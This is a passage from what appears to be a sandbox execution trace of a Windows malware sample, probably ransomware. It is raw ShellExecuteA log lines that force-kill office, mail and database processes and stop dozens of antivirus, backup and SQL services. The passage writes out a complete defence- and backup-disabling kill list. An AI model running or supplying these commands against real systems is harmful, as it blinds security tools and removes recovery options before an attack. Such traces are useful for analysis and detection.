(hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM oracle.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0073.805] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM outlook.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0073.951] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM powerpnt.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0074.058] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM sqbcoreservice.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0074.417] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM sqlagent.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0074.557] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM sqlbrowser.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0075.072] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM sqlservr.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0075.137] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM sqlwriter.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0075.463] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM steam.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0075.550] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM synctime.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0075.922] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM tbirdconfig.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0076.076] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM thebat.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0076.386] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM thebat64.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0076.448] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM thunderbird.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0076.730] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM visio.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0076.799] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM winword.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0077.237] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM wordpad.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0077.363] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM xfssvccon.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0077.873] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM tmlisten.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0077.993] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM PccNTMon.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0078.288] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM CNTAoSMgr.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0078.365] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM Ntrtscan.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0078.911] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="taskkill", lpParameters="/IM mbamtray.exe /F", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0079.021] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Acronis VSS Provider\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0079.433] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Enterprise Client Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0079.618] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos Agent\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0079.916] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos AutoUpdate Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0080.887] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos Clean Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0081.059] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos Device Control Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0081.713] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos File Scanner Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0081.844] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos Health Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0082.314] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos MCS Agent\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0082.368] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos MCS Client\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0082.590] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos Message Router\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0082.645] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos Safestore Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0082.721] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos System Protection Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0083.106] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Sophos Web Control Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0083.241] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"SQLsafe Backup Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0083.944] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"SQLsafe Filter Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0084.744] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Symantec System Recovery\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0084.890] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop \"Veeam Backup Catalog Data Service\" /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0085.134] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop AcronisAgent /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0085.348] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop AcrSch2Svc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0086.062] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop Antivirus /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0087.325] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ARSM /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0088.387] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop BackupExecAgentAccelerator /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0088.596] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop BackupExecAgentBrowser /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0089.028] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop BackupExecDeviceMediaService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0089.234] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop BackupExecJobEngine /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0089.406] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop BackupExecManagementService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0089.555] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop BackupExecRPCService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0089.864] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop BackupExecVSSProvider /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0090.032] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop bedbg /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0090.108] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop DCAgent /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0090.481] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop EPSecurityService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0090.611] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop EPUpdateService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0090.807] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop EraserSvc11710 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0091.593] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop EsgShKernel /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0091.927] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop FA_Scheduler /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0092.807] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop IISAdmin /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0095.356] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop IMAP4Svc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0097.246] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop macmnsvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0097.435] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop masvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0097.810] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MBAMService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0097.931] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MBEndpointAgent /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0098.129] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop McAfeeEngineService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0098.258] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop McAfeeFramework /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0098.318] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop McAfeeFrameworkMcAfeeFramework /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0098.649] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop McShield /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0098.744] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop McTaskManager /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0098.832] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop mfemms /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0098.954] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop mfevtp /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0099.117] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MMS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0099.472] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop mozyprobackup /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0099.738] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MsDtsServer /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0099.860] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MsDtsServer100 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0100.117] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MsDtsServer110 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0100.214] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSExchangeES /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0100.359] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSExchangeIS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0100.423] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSExchangeMGMT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0100.599] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSExchangeMTA /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0100.835] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSExchangeSA /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.005] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSExchangeSRS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.245] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSOLAP$SQL_2008 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.409] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSOLAP$SYSTEM_BGC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.617] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSOLAP$TPS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.842] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSOLAP$TPSAMA /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.908] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$BKUPEXEC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.981] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$ECWDB2 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0102.297] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$PRACTICEMGT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0102.398] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$PRACTTICEBGC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0102.521] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$PROFXENGAGEMENT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0102.693] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$SBSMONITORING /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0102.792] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$SHAREPOINT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0103.018] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$SQL_2008 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0103.106] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$SYSTEM_BGC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0103.587] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$TPS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0103.718] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$TPSAMA /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0103.901] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$VEEAMSQL2008R2 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0104.038] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQL$VEEAMSQL2012 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0104.268] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLFDLauncher /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0104.536] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLFDLauncher$PROFXENGAGEMENT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0104.609] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLFDLauncher$SBSMONITORING /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0104.753] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLFDLauncher$SHAREPOINT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0105.024] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLFDLauncher$SQL_2008 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0105.123] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLFDLauncher$SYSTEM_BGC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0105.370] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLFDLauncher$TPS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0105.509] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLFDLauncher$TPSAMA /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0105.685] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLSERVER /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0106.121] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLServerADHelper100 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0106.181] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MSSQLServerOLAPService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0106.256] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MySQL80 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0106.487] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop MySQL57 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0106.638] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ntrtscan /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0106.947] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop OracleClientCache80 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0107.063] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop PDVFSService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0107.241] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop POP3Svc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0107.325] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ReportServer /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0107.406] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ReportServer$SQL_2008 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0107.751] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ReportServer$SYSTEM_BGC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0107.830] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ReportServer$TPS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0107.895] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ReportServer$TPSAMA /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0107.995] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop RESvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0108.122] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop sacsvr /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0108.359] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SamSs /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0108.479] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SAVAdminService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0108.655] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SAVService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0108.742] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SDRSVC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0108.837] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SepMasterService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0109.351] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop ShMonitor /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0109.550] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop Smcinst /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0109.604] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SmcService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0109.757] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SMTPSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0109.890] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SNAC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.218] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SntpService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.374] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop sophossps /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.487] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$BKUPEXEC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.533] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$ECWDB2 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.577] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$PRACTTICEBGC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.628] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$PRACTTICEMGT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.677] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$PROFXENGAGEMENT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.732] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$SBSMONITORING /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.818] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$SHAREPOINT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0110.883] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$SQL_2008 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0111.331] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$SYSTEM_BGC /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0111.385] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$TPS /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0111.660] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$TPSAMA /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0111.708] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$VEEAMSQL2008R2 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.055] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLAgent$VEEAMSQL2012 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.105] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLBrowser /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.407] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLSafeOLRService /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.457] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLSERVERAGENT /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.725] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLTELEMETRY /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0112.956] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLTELEMETRY$ECWDB2 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0113.386] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SQLWriter /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0114.119] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop SstpSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0114.319] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop svcGenericHost /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0114.712] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop swi_filter /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0114.796] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop swi_service /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0114.882] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop swi_update_64 /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0115.295] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop TmCCSF /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0115.442] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop tmlisten /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0115.887] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop TrueKey /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0115.943] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop TrueKeyScheduler /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0116.150] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop TrueKeyServiceHelper /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0116.283] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop UI0Detect /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0116.690] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="net", lpParameters="stop VeeamBackupSvc /y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0116.789] ShellExecuteA (hwnd=0x0, 